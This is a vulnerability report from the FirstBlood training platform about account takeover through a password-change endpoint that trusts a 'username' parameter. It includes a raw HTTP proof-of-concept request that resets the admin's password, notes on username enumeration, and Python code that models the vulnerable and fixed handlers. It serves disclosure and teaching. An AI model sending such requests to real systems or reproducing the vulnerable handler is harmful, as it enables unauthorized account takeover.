FirstBlood-#706 Full Account takeover (even for admins)
This issue was discovered on FirstBlood v2 (issues patched)



On 2021-10-27, 0xsaltyhash Level 2 reported:

Summary:

There is a commented-out snippet of JS code on /drpanel/index.php. This code is for changing the password of a user; the JS code is incomplete, but one can fill in the blanks easily.

So I guessed that there is an endpoint /drpanel/drapi/editpassword.php that accepts a POST request with a username body parameter. I tried it on my logged-in user and it succeeded, so why stop there? I know from v1 that the admin account username is drAdmin, so I tried it, and indeed I was able to change the password of drAdmin and log in successfully.

POC:

POST /drpanel/drapi/editpassword.php HTTP/1.1
Host: <your_instance>.a.firstbloodhackers.com
Cookie: doctorAuthed=eyJkb2N0b3JBdXRoIjphdXRoZWR9; 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 16

username=drAdmin

Me logged in and able to view patients' appointments (which I couldn't do with my self-registered user).

Impact:

I can take over any user by just knowing the username.

P1 CRITICAL

Endpoint: /drpanel/drapi/editpassword.php

Parameter: username

Payload: username=drAdmin


FirstBlood ID: 27
Vulnerability Type: Application/Business Logic

It is possible to change the admin's password (drAdmin) via /drapi/editpassword, because the endpoint only checks the supplied username and never verifies that the request comes from that user's own session. Usernames can be enumerated on the login page, as trying 'drAdmin' results in a different error message. The username can also be found from FirstBlood v1.
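The root cause, modelled as an added example (this is not FirstBlood's code nor the reporter's): a password-change handler that trusts the `username` form field, beside a hardened version that takes the target account from the authenticated session and demands the current password first. The same block also shows the login behaviour the note above describes, where distinct error messages let an attacker confirm that `drAdmin` exists. The `UserStore`, `Request`, the `password` and `current_password` form fields and the `attempt` helper are all assumptions; the report shows only the `username` field.

```python
import hashlib
import hmac
import secrets
from dataclasses import dataclass


class AuthError(Exception):
    """Raised when a request is rejected; str(err) is the message the client sees."""


def _pbkdf2(password, salt):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)


class UserStore:
    """Toy in-memory user table (constructed for this example, not FirstBlood's schema)."""

    def __init__(self):
        self._rows = {}  # username -> (salt, pbkdf2 hash)

    def add(self, username, password):
        salt = secrets.token_bytes(16)
        self._rows[username] = (salt, _pbkdf2(password, salt))

    def exists(self, username):
        return username in self._rows

    def check(self, username, password):
        row = self._rows.get(username)
        if row is None:
            _pbkdf2(password, b"\x00" * 16)  # burn a hash so timing does not reveal unknown users
            return False
        salt, stored = row
        return hmac.compare_digest(stored, _pbkdf2(password, salt))

    def set_password(self, username, password):
        if username not in self._rows:
            raise KeyError(username)
        self.add(username, password)


@dataclass
class Request:
    """The parts of an HTTP request that matter here: the session the auth cookie
    resolves to ({} when anonymous, {"username": ...} after login) and the form body."""
    session: dict
    form: dict


def edit_password_vulnerable(store, req):
    """As the report describes v2: the only gate is 'has a doctor session', and the
    account whose password changes is whatever `username` the body names."""
    if not req.session:
        raise AuthError("not logged in")
    target = req.form["username"]
    store.set_password(target, req.form["password"])  # `password` field is an assumption
    return target


def edit_password_fixed(store, req):
    """Hardened: the target is the session's own user, the body's `username` is ignored,
    and the caller must prove knowledge of the current password before changing it."""
    actor = req.session.get("username")
    if actor is None:
        raise AuthError("not logged in")
    if not store.check(actor, req.form.get("current_password", "")):
        raise AuthError("current password incorrect")
    new_password = req.form.get("password", "")
    if len(new_password) < 12:
        raise AuthError("new password too short")
    store.set_password(actor, new_password)
    return actor


def login_vulnerable(store, username, password):
    """Distinct messages for 'no such user' and 'wrong password' allow username enumeration."""
    if not store.exists(username):
        raise AuthError("no such user")
    if not store.check(username, password):
        raise AuthError("wrong password")
    return username


def login_fixed(store, username, password):
    """One generic message whether the username exists or not."""
    if not store.check(username, password):
        raise AuthError("invalid username or password")
    return username


def attempt(fn, *args):
    """Run a handler and report 'ok:<user>' or 'error:<message>' so outcomes compare easily."""
    try:
        return "ok:" + fn(*args)
    except AuthError as err:
        return "error:" + str(err)
```

Against `edit_password_vulnerable`, a session for a self-registered doctor plus the body `username=drAdmin` rewrites the admin's credential; against `edit_password_fixed` the same request fails on the current-password check and, even when that is supplied, only ever changes the caller's own account. For the login pair, probing `drAdmin` and a random name yields two different messages from the vulnerable handler and one identical message from the fixed one.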